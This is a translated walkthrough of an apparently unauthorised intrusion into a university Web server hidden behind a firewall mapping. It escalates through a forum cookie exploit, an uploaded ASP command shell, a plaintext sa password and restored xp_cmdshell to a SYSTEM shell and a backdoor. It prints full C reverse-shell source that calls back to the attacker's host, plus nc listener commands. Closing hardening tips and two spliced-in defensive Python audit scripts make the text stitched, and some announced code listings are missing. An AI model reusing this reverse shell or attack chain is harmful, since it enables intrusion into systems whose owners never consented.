Security problems of a Web server placed on the intranet

Source: Internet
Author: User
Tags: iis, include, connect, mssql, sql, sql injection, version, access

Many companies and organizations place their Web servers on the intranet and publish them through a port mapping on the firewall, which forwards requests arriving on port 80 to the Web port of the intranet server.

This improves security considerably, but it does not mean that a Web server hidden on the intranet is necessarily safe: the server itself still has plenty of problems, particularly in its CGI programs, and these are the easiest place for people to overlook. Below I take a Web server with port 80 open as an example, test it for security problems, describe each problem found, and point out the root cause and the wrong practices that allow it.

The target is a university's entertainment and leisure website. I went in and had a look; the pages are nicely done. First, let's see what Web server it runs:

D:\>nc -vv www.target.com 80
DNS fwd/rev mismatch: www.target.com != traget
www.target.com [192.168.0.1] 80 (http) open
GET / HTTP/1.0
Host: www.target.com

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Content-Location: http://www.target.com/index.asp
Date: Thu, 22 May 2003 12:13:32 GMT
Content-Type: text/html
......

It is IIS 5.0, so let's see whether it can be overflowed directly. Try the latest IIS WebDAV overflow (the ntdll.dll bug, MS03-007). Personally I find isno's exploit for that overflow the most useful, but its payload binds a cmd shell on port 7788 of the target, which is no use for our intrusion because the host sits on the intranet behind the firewall. So I modified it to connect back instead, but in the end it still failed; the other side appears to be patched.

Strolling around the other applications, I found a BBS: Dvbbs (Dynamic Network Forum), and a fairly old version, 5.00320. This is often our breakthrough (the first major failure). Quite a while ago my friend Pskey and I found that one cookie variable was not filtered, and he wrote an exploit for it (the program is on the accompanying CD). Through this vulnerability I can change the password of any user, the chief moderator included. I log in with that ID, enter the back-end administration, and change the settings to allow uploading of .exe, .asp and other file types.

Next, is FSO (FileSystemObject) disabled? It is not (the second major failure). Through the upload I put up an aspcmdshell. This aspcmdshell lets me execute commands on the Web server with the permissions of the Guests group, which of course depends on the Guests group not having been denied access to %systemroot%\system32\cmd.exe. Try "dir c:\" to see whether it is forbidden: it is not (the third major failure). In fact, even if Guests had been denied access to cmd.exe it would not have mattered much: we could upload our own copy of cmd.exe and point the aspcmdshell at it. With this aspcmdshell we can already do a great deal. Of course that is not enough; my goal is the highest privilege, so now I prepare to escalate. First let's see what the administrator has given the Guests group; start with the output of ipconfig:

Windows IP Configuration

Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 192.168.1.222
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.1.1

So it is on the intranet. Good. Next, can we write to C:\? No (good). Another directory? The whole C: drive is not writable; only the Web directory has write permission. Now let's see what services are running, using the netstat -an command.
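The netstat -an check the article performs next is worth automating on any host you audit or respond on. The following Python script is an added example and not code from the original article: it parses netstat -an output as Windows 2000 prints it (a constructed sample is embedded, including the 127.0.0.1:1433 listener the article goes on to find) and separates sockets reachable from the network from those bound only to loopback. The security point is that a loopback-only binding such as 127.0.0.1:1433 protects the database from the LAN but not from anyone who can already run code on the Web server, which is exactly the position an uploaded ASP shell gives the intruder.

```python
import re

# Well-known ports on a Windows 2000 server, for labelling what netstat shows.
KNOWN_PORTS = {
    21: "ftp", 25: "smtp", 80: "http", 135: "rpc-epmap", 139: "netbios-ssn",
    443: "https", 445: "smb", 1433: "mssql", 1434: "mssql-resolution", 3389: "rdp",
}

# Constructed sample of `netstat -an` output as Windows 2000 prints it; the
# 127.0.0.1:1433 line is the one the article finds on the compromised host.
SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    127.0.0.1:1433         0.0.0.0:0              LISTENING
  TCP    192.168.1.222:80       192.168.1.1:3421       ESTABLISHED
  UDP    0.0.0.0:1434           *:*
"""

# Proto, local ip:port, foreign address, optional state (UDP lines have none).
_SOCKET_LINE = re.compile(r"^\s*(TCP|UDP)\s+(\S+):(\d+)\s+(\S+)(?:\s+(\S+))?\s*$")


def parse_netstat(text):
    """Return (proto, local_ip, local_port, state) for each socket line.
    Header and blank lines are skipped; UDP sockets get the state 'UDP'."""
    sockets = []
    for line in text.splitlines():
        m = _SOCKET_LINE.match(line)
        if m:
            proto, ip, port, _foreign, state = m.groups()
            sockets.append((proto, ip, int(port), state or proto))
    return sockets


def listeners(text):
    """Listening sockets only (established TCP connections are dropped), each
    annotated with the service name and whether it is bound to loopback."""
    out = []
    for proto, ip, port, state in parse_netstat(text):
        if proto == "TCP" and state != "LISTENING":
            continue
        out.append({"proto": proto, "port": port,
                    "service": KNOWN_PORTS.get(port, "unknown"),
                    "loopback_only": ip.startswith("127.")})
    return out


def network_reachable(text):
    """Services an attacker on the LAN can reach directly."""
    return sorted("%s/%d %s" % (l["proto"], l["port"], l["service"])
                  for l in listeners(text) if not l["loopback_only"])


def host_local_only(text):
    """Services that are safe from the network but open to anyone who can run
    code on the host, for example through an uploaded ASP shell."""
    return sorted("%s/%d %s" % (l["proto"], l["port"], l["service"])
                  for l in listeners(text) if l["loopback_only"])


if __name__ == "__main__":
    print("reachable from the network:", network_reachable(SAMPLE_NETSTAT))
    print("loopback only:", host_local_only(SAMPLE_NETSTAT))
```

Feed it the saved output of netstat -an from the host under review; anything in the loopback-only list still needs its own authentication and least-privilege configuration, because local access is all an intruder with a Web shell has anyway.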

TCP    127.0.0.1:1433    0.0.0.0:0    LISTENING

Oh, MSSQL is running too. Good. The first thing to do is find out which programs use the MSSQL database. Back on the home page there is a news system, the most likely candidate. Using the aspcmdshell I inspected the ASP files in the news/ directory; many of them share the same first lines, which are basically the database connection code. Here it is:

strconn = "Driver={SQL Server};Description=sqldemo;" & _
          "server=127.0.0.1;uid=sa;" & _
          "pwd=hello;database=news"
Set conn = Server.CreateObject("ADODB.Connection")
conn.Open strconn

Sure enough, just as I expected (the fourth major failure: the MSSQL user name and password stored in plaintext in an ASP file). I now have the database password, and the login is sa, which carries very broad permissions. I had originally planned to look for SQL injection vulnerabilities in the news system's ASP code; there is no need for that now. Instead I write an ASP page that uses the MSSQL extended stored procedure xp_cmdshell to execute system commands. The administrator may have removed this extended procedure, or deleted the xplog70.dll file that implements it, but let's try it first. Write sql.asp with the following content:

First configure my own firewall to log ICMP packets, then request the page in IE:

http://www.target.com/bbs/uploadimages/439587438739.asp?cmd=ping%20192.168.0.1

This ASP was uploaded through the Dvbbs upload program. According to the forum's upload settings, uploaded files go into the uploadimages/ directory and are renamed after the current time, which is why the file name is a string of digits such as 439587438739.asp.

The firewall logs nothing, damn! It looks like the xp_cmdshell extended stored procedure has been dropped, or xplog70.dll has been deleted outright. If only the extended procedure was dropped and xplog70.dll is still in place, I can try to restore it. So write another ASP:

Upload it, then request http://www.target.com/bbs/uploadimages/23456489432.asp in IE.

Then submit the earlier request again:

http://www.target.com/bbs/uploadimages/439587438739.asp?cmd=ping%20192.168.0.1

Now our firewall responds: ICMP packets from www.target.com are logged. So it works; through this ASP we can execute many commands (the fifth major failure), all with SYSTEM privileges, but nothing is echoed back, which is not ideal. So I want an interactive shell. Write a reverse-connect program:

#include <winsock2.h>
#include <windows.h>
#include <string.h>
#pragma comment(lib, "ws2_32")

void main(int argc, char *argv[])
{
    WSADATA wsaData;
    SOCKET hSocket;
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    struct sockaddr_in adik_sin;

    memset(&adik_sin, 0, sizeof(adik_sin));
    memset(&si, 0, sizeof(si));
    WSAStartup(MAKEWORD(2, 0), &wsaData);

    /* WSASocket rather than socket(): the handle must be usable as a
       standard handle of the child process */
    hSocket = WSASocket(AF_INET, SOCK_STREAM, 0, NULL, 0, 0);

    adik_sin.sin_family = AF_INET;
    adik_sin.sin_port = htons(53);                        /* connect to port 53 on my host */
    adik_sin.sin_addr.s_addr = inet_addr("192.168.0.1");  /* IP of my host */
    connect(hSocket, (struct sockaddr *)&adik_sin, sizeof(adik_sin));

    /* hand the socket to cmd.exe as stdin/stdout/stderr; bInheritHandles
       must be TRUE or the child cannot use it */
    si.cb = sizeof(si);
    si.dwFlags = STARTF_USESTDHANDLES;
    si.hStdInput = si.hStdOutput = si.hStdError = (HANDLE)hSocket;
    CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi);

    ExitProcess(0);
}

Compile it into an .exe and upload it. On my own machine, first start a listener on port 53, then execute in IE:

http://www.target.com/bbs/uploadimages/439587438739.asp?cmd=d:\inetpub\wwwroot\bbs\uploadimages\3215645664654.exe

D:\>nc -l -p 53
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

D:\inetpub\wwwroot\bbs\uploadimages>ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 192.168.1.222
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.1.1

D:\inetpub\wwwroot\bbs\uploadimages>

All right, the intrusion is essentially complete: we now have an interactive shell with SYSTEM privileges and can "do whatever we want". At this point we can install a back door so that we need not go through all this trouble next time. I used my own "a us-backdoor", which lets us get an interactive shell through port 80 without affecting the normal operation of IIS itself; it can be downloaded from my home page.

Each of the failures above let the intruder gain a little more privilege, and a competent administrator could have avoided every one of them. A small mistake in an ASP program can thus hand your server to a cracker. Programmers, it is time to take a look at your code. For the major failures mentioned above, here are a few basic points for administrators:

(1) Do not use ASP applications with many known vulnerabilities, especially old versions of Dvbbs. If you must use them, check the vendor's official forum regularly for news of new vulnerabilities and patch or upgrade promptly.

(2) If FSO (FileSystemObject) is not needed, disable it.

(3) Use the command cacls %systemroot%\system32\cmd.exe /e /d guests to deny the Guests group access to cmd.exe.

(4) As far as possible, do not store the database password in plaintext in ASP files; connect to the database through a data source (DSN) instead.

(5) Ordinary users should not be able to use the xp_cmdshell extended stored procedure; it is best to delete xplog70.dll. Try not to connect as sa: give sa a complex password, and create a separate login for the application with the minimum rights it needs.
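The connection string found in the news system's ASP code earlier in the article is the pattern recommendations (4) and (5) are about, and it is easy to check for mechanically across a Web root. The following Python script is an added example and not code from the original article: it reassembles VBScript string literals joined with & (including the _ line continuation), recognizes ADO/ODBC connection strings, and flags a plaintext password, the sa login, and a login with no password at all. Both sample ASP files are constructed; the hardened one uses a DSN with Windows integrated authentication (Trusted_Connection=yes), which is one way to keep the secret out of the file, and leaves the choice of the connecting account and its rights to the server, as recommendation (5) advises.

```python
import re

PASSWORD_KEYS = {"pwd", "password"}
USER_KEYS = {"uid", "user id", "user", "username"}
PRIVILEGED_LOGINS = {"sa"}                  # SQL Server's built-in administrator login
MARKERS = ("driver=", "provider=", "dsn=")  # what identifies an ADO/ODBC connection string

# VBScript:  name = "piece" & _ <newline> "piece" & "piece" ...
_ASSIGN = re.compile(r'\b(\w+)\s*=\s*((?:"[^"]*"\s*(?:&\s*_?\s*)?)+)', re.S)
_PIECE = re.compile(r'"([^"]*)"')


def find_connection_strings(asp_source):
    """Return {variable: value} for every VBScript string assignment whose value
    looks like a connection string. Pieces joined with & are concatenated the
    way the VBScript runtime would; concatenation with non-literals is ignored."""
    found = {}
    for name, rhs in _ASSIGN.findall(asp_source):
        value = "".join(_PIECE.findall(rhs))
        if any(m in value.lower() for m in MARKERS):
            found[name] = value
    return found


def parse_connection_string(value):
    """Split 'k=v;k=v' into a dict with lower-cased keys; braces around a value
    such as Driver={SQL Server} are removed."""
    params = {}
    for part in value.split(";"):
        if "=" in part:
            key, val = part.split("=", 1)
            params[key.strip().lower()] = val.strip().strip("{}")
    return params


def assess(value):
    """Findings for one connection string, in the order a reviewer raises them."""
    p = parse_connection_string(value)
    user = next((p[k] for k in USER_KEYS if k in p), None)
    has_password = any(k in p for k in PASSWORD_KEYS)
    integrated = (p.get("trusted_connection", "").lower() == "yes"
                  or p.get("integrated security", "").lower() == "sspi")
    findings = []
    if has_password and not integrated:
        findings.append("PLAINTEXT_PASSWORD")   # the article's fourth failure
    if user and user.lower() in PRIVILEGED_LOGINS:
        findings.append("PRIVILEGED_LOGIN")     # sa: xp_cmdshell and everything else
    if user and not integrated and not has_password:
        findings.append("BLANK_PASSWORD")       # SQL login with an empty password
    return findings


def audit_asp(asp_source):
    """Map each connection-string variable in one ASP file to its findings."""
    return {name: assess(value)
            for name, value in find_connection_strings(asp_source).items()}


# Constructed sample: the news system's connection code as shown in the article.
VULNERABLE_ASP = '''<%
strconn = "Driver={SQL Server};Description=sqldemo;" & _
          "server=127.0.0.1;uid=sa;" & _
          "pwd=hello;database=news"
Set conn = Server.CreateObject("ADODB.Connection")
conn.Open strconn
%>'''

# Constructed sample of a fix: a DSN plus integrated authentication, so no
# secret and no sa login live in the file.
HARDENED_ASP = '''<%
strconn = "DSN=news;Trusted_Connection=yes"
Set conn = Server.CreateObject("ADODB.Connection")
conn.Open strconn
%>'''

if __name__ == "__main__":
    for label, source in (("vulnerable", VULNERABLE_ASP), ("hardened", HARDENED_ASP)):
        print(label, audit_asp(source))
```

To sweep a whole site, call audit_asp on the contents of every .asp and .inc file under the Web root; a PRIVILEGED_LOGIN finding on a file the IIS anonymous account can read means the database is already lost to anyone who gets a Web shell, whether or not xp_cmdshell still exists.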

Postscript

The site attacked here is not a bare machine exposed to the outside but a service placed on the intranet and published through a firewall mapping. If you are the site concerned, please get in touch and state your name. Contact email: edu#chinaz.com (change # to @).


